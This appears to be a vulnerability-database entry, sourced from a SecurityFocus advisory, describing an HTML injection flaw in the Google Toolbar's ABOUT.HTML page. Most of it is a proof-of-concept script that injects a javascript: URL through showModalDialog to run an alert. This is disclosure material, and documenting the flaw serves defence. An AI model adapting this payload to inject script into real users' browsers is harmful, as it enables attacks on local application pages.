11 lines
No EOL
568 B
Text
11 lines
No EOL
568 B
Text
source: http://www.securityfocus.com/bid/11210/info
|
|
|
|
Google Toolbar is reported prone to a HTML injection vulnerability. It is reported that the Google Toolbar 'ABOUT.HTML' page allows the injection of HTML and JavaScript code.
|
|
|
|
This vulnerability may allow an attacker to inject malicious HTML and script code into the about page of the vulnerable application.
|
|
|
|
<s c r i p t>
|
|
window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML",
|
|
"<div style=\"background-image:
|
|
url(javascript:alert(location.href));\">");
|
|
</s c r i p t> |